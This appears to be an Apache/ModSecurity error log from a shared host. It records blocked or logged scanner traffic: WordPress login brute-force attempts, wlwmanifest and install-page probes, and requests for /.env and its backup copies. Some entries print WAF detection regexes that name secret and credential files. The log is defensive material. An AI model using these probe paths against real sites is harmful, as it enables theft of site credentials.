[Tue May 26 14:48:11.221286 2026] [security2:error] [pid 648203:tid 648440] [client 45.154.98.38:0] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "cpanel.ndequipments.com"] [uri "/site/wp-includes/wlwmanifest.xml"] [unique_id "ahVlU7EQDDtxJNiDrdTW_AAAAPA"]
[Tue May 26 14:48:11.536335 2026] [security2:error] [pid 648203:tid 648377] [client 45.154.98.38:0] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "cpanel.ndequipments.com"] [uri "/cms/wp-includes/wlwmanifest.xml"] [unique_id "ahVlU7EQDDtxJNiDrdTXBwAAALE"]
[Tue May 26 14:48:11.797702 2026] [security2:error] [pid 648203:tid 648355] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVlU7EQDDtxJNiDrdTXAwAAAJs"]
[Tue May 26 14:48:11.852094 2026] [security2:error] [pid 648203:tid 648395] [client 45.154.98.38:0] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "cpanel.ndequipments.com"] [uri "/sito/wp-includes/wlwmanifest.xml"] [unique_id "ahVlU7EQDDtxJNiDrdTXHwAAAMM"]
[Tue May 26 14:48:12.455635 2026] [security2:error] [pid 648203:tid 648453] [client 216.26.250.32:12963] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVlU7EQDDtxJNiDrdTXBAAAAP0"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:48:13.456299 2026] [security2:error] [pid 648203:tid 648378] [client 57.141.2.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVlVbEQDDtxJNiDrdTXTwAAALI"]
[Tue May 26 14:48:13.755667 2026] [security2:error] [pid 648203:tid 648348] [client 20.12.194.227:63747] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 227.194.12.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.grappyfilms.com.md-74.webhostbox.net"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahVlVbEQDDtxJNiDrdTXZAAAAJQ"]
[Tue May 26 14:48:13.755800 2026] [security2:error] [pid 648203:tid 648348] [client 20.12.194.227:63747] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.grappyfilms.com.md-74.webhostbox.net"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahVlVbEQDDtxJNiDrdTXZAAAAJQ"]
[Tue May 26 14:48:13.876796 2026] [security2:error] [pid 648203:tid 648441] [client 20.12.194.227:31670] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 227.194.12.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.grappyfilms.com.md-74.webhostbox.net"] [uri "/about.php"] [unique_id "ahVlVbEQDDtxJNiDrdTXbgAAAPE"]
[Tue May 26 14:48:13.876900 2026] [security2:error] [pid 648203:tid 648441] [client 20.12.194.227:31670] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.grappyfilms.com.md-74.webhostbox.net"] [uri "/about.php"] [unique_id "ahVlVbEQDDtxJNiDrdTXbgAAAPE"]
[Tue May 26 14:48:14.587093 2026] [security2:error] [pid 648203:tid 648458] [client 209.50.162.1:28693] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVlVbEQDDtxJNiDrdTXXQAAAQI"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:48:14.853942 2026] [security2:error] [pid 648203:tid 648437] [client 74.7.241.191:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "503"] [hostname "shahvishaal.com"] [uri "/index.php"] [unique_id "ahVlVLEQDDtxJNiDrdTXLwAAAO0"]
[Tue May 26 14:48:14.854737 2026] [security2:error] [pid 648203:tid 648353] [client 74.7.241.191:44850] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "503"] [hostname "shahvishaal.com"] [uri "/robots.txt"] [unique_id "ahVlVLEQDDtxJNiDrdTXLQAAmWQ"]
[Tue May 26 14:48:15.820471 2026] [security2:error] [pid 648203:tid 648302] [remote 5.42.158.148:57032] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 148.158.42.5.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-login.php"] [unique_id "ahVlV7EQDDtxJNiDrdTXoQAAw2I"]
[Tue May 26 14:48:15.919994 2026] [security2:error] [pid 648203:tid 648377] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVlV7EQDDtxJNiDrdTXnQAAALE"]
[Tue May 26 14:48:16.208736 2026] [security2:error] [pid 648203:tid 648412] [client 114.119.139.43:25143] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "rainadelproperties.com"] [uri "/wp-content/uploads/2017/04/house-demo2-45-143x83.jpg"] [unique_id "ahVlWLEQDDtxJNiDrdTXugAAANQ"], referer: https://rainadelproperties.com/wp-content/uploads/2017/04/house-demo2-45-143x83.jpg
[Tue May 26 14:48:16.749039 2026] [security2:error] [pid 648203:tid 648394] [client 216.26.227.165:44845] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVlV7EQDDtxJNiDrdTXogAAAMI"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:48:18.469964 2026] [security2:error] [pid 648203:tid 648411] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVlWrEQDDtxJNiDrdTX9wAAANM"]
[Tue May 26 14:48:18.872886 2026] [security2:error] [pid 648203:tid 648429] [client 216.26.234.93:22621] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVlWbEQDDtxJNiDrdTX8QAAAOU"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:48:19.112614 2026] [security2:error] [pid 648203:tid 648400] [client 162.244.144.154:26883] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahVlWrEQDDtxJNiDrdTYDQAAAMg"], referer: https://anujtradingco.com
[Tue May 26 14:48:19.198144 2026] [security2:error] [pid 648203:tid 648340] [client 85.208.96.204:51832] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/category/flipping-fridays/list/"] [unique_id "ahVlW7EQDDtxJNiDrdTYJwAAAIw"]
[Tue May 26 14:48:19.198278 2026] [security2:error] [pid 648203:tid 648340] [client 85.208.96.204:51832] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/category/flipping-fridays/list/"] [unique_id "ahVlW7EQDDtxJNiDrdTYJwAAAIw"]
[Tue May 26 14:48:20.269086 2026] [security2:error] [pid 648203:tid 648427] [client 216.73.217.72:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.ndequipments.com"] [uri "/index.php"] [unique_id "ahVlXLEQDDtxJNiDrdTYTQAA4wU"]
[Tue May 26 14:48:20.654553 2026] [security2:error] [pid 648203:tid 648376] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVlXLEQDDtxJNiDrdTYTAAAALA"]
[Tue May 26 14:48:21.071385 2026] [security2:error] [pid 648203:tid 648441] [client 209.50.169.235:39873] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVlW7EQDDtxJNiDrdTYRQAAAPE"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:48:22.402945 2026] [security2:error] [pid 648203:tid 648427] [client 64.89.163.250:58835] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "anujtradingco.com"] [uri "/.env"] [unique_id "ahVlXrEQDDtxJNiDrdTYhwAAAOM"]
[Tue May 26 14:48:22.447212 2026] [security2:error] [pid 648203:tid 648368] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVlXbEQDDtxJNiDrdTYfQAAAKg"]
[Tue May 26 14:48:23.286703 2026] [security2:error] [pid 648203:tid 648355] [client 45.3.55.147:9491] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVlXrEQDDtxJNiDrdTYhAAAAJs"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:48:24.480966 2026] [security2:error] [pid 648203:tid 648222] [remote 94.76.235.103:34758] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.235.76.94.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/wp-login.php"] [unique_id "ahVlYLEQDDtxJNiDrdTYzgAApRI"]
[Tue May 26 14:48:25.247032 2026] [security2:error] [pid 648203:tid 648372] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVlYLEQDDtxJNiDrdTY4AAAAKw"]
[Tue May 26 14:48:25.515282 2026] [security2:error] [pid 648203:tid 648369] [client 216.26.237.252:29101] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVlYLEQDDtxJNiDrdTYzwAAAKk"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:48:26.925701 2026] [security2:error] [pid 648203:tid 648339] [client 158.173.20.27:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVlYrEQDDtxJNiDrdTZHgAAAIs"]
[Tue May 26 14:48:27.583034 2026] [security2:error] [pid 648203:tid 648449] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVlY7EQDDtxJNiDrdTZJQAAAPk"]
[Tue May 26 14:48:27.620772 2026] [security2:error] [pid 648203:tid 648369] [client 158.173.20.27:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVlY7EQDDtxJNiDrdTZMwAAqR8"]
[Tue May 26 14:48:28.172771 2026] [security2:error] [pid 648203:tid 648436] [client 146.174.165.76:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVlY7EQDDtxJNiDrdTZPgAAAOw"]
[Tue May 26 14:48:28.266472 2026] [security2:error] [pid 648203:tid 648236] [remote 158.173.20.27:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 27.20.173.158.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/wp-admin/install.php"] [unique_id "ahVlZLEQDDtxJNiDrdTZTgAA9SA"]
[Tue May 26 14:48:28.266712 2026] [security2:error] [pid 648203:tid 648445] [client 158.173.20.27:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "ndequipments.com"] [uri "/wp-admin/install.php"] [unique_id "ahVlZLEQDDtxJNiDrdTZTgAA9SA"]
[Tue May 26 14:48:28.478520 2026] [security2:error] [pid 648203:tid 648218] [remote 158.173.20.27:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 27.20.173.158.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/wp-admin/setup-config.php"] [unique_id "ahVlZLEQDDtxJNiDrdTZVgAA4Q4"]
[Tue May 26 14:48:28.478737 2026] [security2:error] [pid 648203:tid 648425] [client 158.173.20.27:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "ndequipments.com"] [uri "/wp-admin/setup-config.php"] [unique_id "ahVlZLEQDDtxJNiDrdTZVgAA4Q4"]
[Tue May 26 14:48:28.508476 2026] [security2:error] [pid 648203:tid 648426] [client 45.148.10.5:61838] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com.onesoft.in"] [uri "/.env.backup"] [unique_id "ahVlZLEQDDtxJNiDrdTZVwAAAOI"]
[Tue May 26 14:48:28.883647 2026] [security2:error] [pid 648203:tid 648346] [client 104.207.53.246:65255] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVlY7EQDDtxJNiDrdTZNwAAAJI"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:48:29.333263 2026] [security2:error] [pid 648203:tid 648384] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVlZLEQDDtxJNiDrdTZYwAAALg"]
[Tue May 26 14:48:29.905286 2026] [security2:error] [pid 648203:tid 648242] [remote 3.208.180.187:48726] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 187.180.208.3.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/wp-login.php"] [unique_id "ahVlZbEQDDtxJNiDrdTZhQAAsSY"]
[Tue May 26 14:48:30.663119 2026] [security2:error] [pid 648203:tid 648254] [remote 209.38.251.46:48152] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 46.251.38.209.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/wp-login.php"] [unique_id "ahVlZrEQDDtxJNiDrdTZogAAhzI"]
[Tue May 26 14:48:31.027098 2026] [security2:error] [pid 648203:tid 648383] [client 65.111.30.218:48761] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVlZbEQDDtxJNiDrdTZiQAAALc"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:48:31.921892 2026] [security2:error] [pid 648203:tid 648338] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVlZ7EQDDtxJNiDrdTZ6QAAAIo"]
[Tue May 26 14:48:32.037738 2026] [security2:error] [pid 648203:tid 648339] [client 165.140.119.146:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVlZ7EQDDtxJNiDrdTZ_gAAAIs"], referer: https://www.bloggertarget.com
[Tue May 26 14:48:32.502802 2026] [security2:error] [pid 648203:tid 648303] [remote 88.198.91.116:55758] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 116.91.198.88.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/wp-login.php"] [unique_id "ahVlaLEQDDtxJNiDrdTaEQAA1mM"]
[Tue May 26 14:48:33.093195 2026] [security2:error] [pid 648203:tid 648420] [client 74.249.173.207:2565] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.xn--seordeanimas-bhb.com.md-74.webhostbox.net"] [uri "/wk/index.php"] [unique_id "ahVlabEQDDtxJNiDrdTaIQAAANw"]
[Tue May 26 14:48:33.154602 2026] [security2:error] [pid 648203:tid 648423] [client 216.26.239.147:31587] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVlaLEQDDtxJNiDrdTaAwAAAN8"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:48:34.239234 2026] [security2:error] [pid 648203:tid 648345] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVlabEQDDtxJNiDrdTaNwAAAJE"]
[Tue May 26 14:48:35.279074 2026] [security2:error] [pid 648203:tid 648384] [client 216.26.242.84:20827] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVlarEQDDtxJNiDrdTaPQAAALg"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:48:35.431112 2026] [proxy:error] [pid 648203:tid 648444] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:35.431169 2026] [proxy_http:error] [pid 648203:tid 648444] [client 5.255.125.104:52330] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:35.431783 2026] [proxy:error] [pid 648203:tid 648444] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:35.431825 2026] [proxy_http:error] [pid 648203:tid 648444] [client 5.255.125.104:52330] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:36.003232 2026] [security2:error] [pid 648203:tid 648389] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVla7EQDDtxJNiDrdTacgAAAL0"]
[Tue May 26 14:48:36.183757 2026] [proxy:error] [pid 648203:tid 648342] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:36.183811 2026] [proxy_http:error] [pid 648203:tid 648342] [client 5.255.125.104:45032] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:36.184640 2026] [proxy:error] [pid 648203:tid 648342] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:36.184682 2026] [proxy_http:error] [pid 648203:tid 648342] [client 5.255.125.104:45032] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:37.324715 2026] [security2:error] [pid 648203:tid 648386] [client 45.148.10.5:35036] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com.onesoft.in"] [uri "/.env.old"] [unique_id "ahVlbbEQDDtxJNiDrdTaugAAALo"]
[Tue May 26 14:48:37.378022 2026] [security2:error] [pid 648203:tid 648387] [client 209.50.161.222:22233] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVlbLEQDDtxJNiDrdTakgAAALs"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:48:37.749701 2026] [proxy:error] [pid 648203:tid 648339] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:37.749777 2026] [proxy_http:error] [pid 648203:tid 648339] [client 5.255.125.104:52356] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:37.750414 2026] [proxy:error] [pid 648203:tid 648339] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:37.750470 2026] [proxy_http:error] [pid 648203:tid 648339] [client 5.255.125.104:52356] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:37.761510 2026] [proxy:error] [pid 648203:tid 648374] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:37.761601 2026] [proxy_http:error] [pid 648203:tid 648374] [client 5.255.125.104:52606] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:37.761790 2026] [proxy:error] [pid 648203:tid 648428] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:37.761868 2026] [proxy_http:error] [pid 648203:tid 648428] [client 5.255.125.104:52652] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:37.762047 2026] [proxy:error] [pid 648203:tid 648458] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:37.762142 2026] [proxy_http:error] [pid 648203:tid 648458] [client 5.255.125.104:52560] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:37.762229 2026] [proxy:error] [pid 648203:tid 648374] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:37.762267 2026] [proxy_http:error] [pid 648203:tid 648374] [client 5.255.125.104:52606] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:37.762472 2026] [proxy:error] [pid 648203:tid 648428] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
